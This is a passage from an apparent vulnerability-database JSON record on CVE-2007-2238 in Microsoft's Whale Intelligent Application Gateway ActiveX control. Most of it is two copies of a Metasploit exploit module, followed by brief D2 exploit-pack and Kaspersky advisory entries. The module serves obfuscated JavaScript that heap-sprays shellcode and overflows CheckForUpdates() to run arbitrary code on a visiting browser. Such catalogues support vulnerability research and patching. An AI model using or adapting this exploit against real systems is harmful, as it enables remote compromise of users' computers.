Client. When sending an overly long string to CheckForUpdates()\r\n\t\t\t\tmethod of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2238' ],\r\n\t\t\t\t\t[ 'OSVDB', '53933'],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 15 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# fluff..\r\n\t\tfluff = rand_text_english(rand(20) + 1)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Set the return.\r\n\t\tret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2)\r\n\r\n\t\tjs = %Q|\r\n\t\t\ttry {\r\n\t\t\t\tvar evil_string = \"\";\r\n\t\t\t\tvar index;\r\n\t\t\t\tvar vulnerable = new ActiveXObject('ComponentManager.Installer.1');\r\n\t\t\t\tvar my_unescape = unescape;\r\n\t\t\t\tvar shellcode = '#{shellcode}';\r\n\t\t\t\t#{js_heap_spray}\r\n\t\t\t\tsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\r\n\t\t\t\tfor (index = 0; index < 15000; index++) {\r\n\t\t\t\t\tevil_string = evil_string + my_unescape('#{ret}');\r\n\t\t\t\t}\r\n\t\t\t\tvulnerable.CheckForUpdates(evil_string,'#{fluff}');\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t|\r\n\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => [\r\n\t\t\t\t\t'vulnerable',\r\n\t\t\t\t\t'shellcode',\r\n\t\t\t\t\t'my_unescape',\r\n\t\t\t\t\t'index',\r\n\t\t\t\t\t'evil_string',\r\n\t\t\t\t]\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.update_opts(js_heap_spray.opts)\r\n\t\tjs.obfuscate()\r\n\t\tcontent = %Q|<html>\r\n<body>\r\n<script><!--\r\n#{js}\r\n//</script>\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16608/"}], "d2": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "exploit", "description": "**Name**| d2sec_msiag \n---|--- \n**CVE**| CVE-2007-2238 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Microsoft IAG 2007 ActiveX Stack Overflow Vulnerability \n**Notes**| \n", "modified": "2009-04-16T15:12:00", "published": "2009-04-16T15:12:00", "id": "D2SEC_MSIAG", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_msiag", "title": "DSquare Exploit Pack: D2SEC_MSIAG", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:37", "bulletinFamily": "info", "description": "### *Detect date*:\n04/16/2009\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn unspecified vulnerability was found in Microsoft IAG. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via specially designed arguments.\n\n### *Affected products*:\nMicrosoft Intelligent Application Gateway versions 3.7 SP1 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Intelligent Application Gateway](<https://threats.kaspersky.com/en/product/Microsoft-Intelligent-Application-Gateway/>)\n\n### *CVE-IDS*:\n[CVE-2007-2238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2238>)9.3Critical", "modified": "2019-03-07T00:00:00", "published": "2009-04-16T00:00:00", "id": "KLA10392", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10392", "title": "\r KLA10392ACE vulnerability in Microsoft Intelligent Application Gateway ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-02T07:59:58", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application Gateway Whale Client. When sending an overly long string to CheckForUpdates() method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute arbitrary code.\n", "modified": "2017-10-05T21:44:36", "published": "2009-04-15T21:38:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES", "href": "", "type": "metasploit", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-2238' ],\n [ 'OSVDB', '53933'],\n [ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Apr 15 2009',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # fluff..\n fluff = rand_text_english(rand(20) + 1)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Set the return.\n ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2)\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n var vulnerable = new ActiveXObject('ComponentManager.Installer.1');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\n for (index = 0; index < 15000; index++) {\n evil_string = evil_string + my_unescape('#{ret}');\n }\n vulnerable.CheckForUpdates(evil_string,'#{fluff}');\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate(memory_sensitive: true)\n content = %Q|<html>\n<body>\n<script><!--\n#{js}\n//</script>\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mswhale_checkforupdates.rb"}]}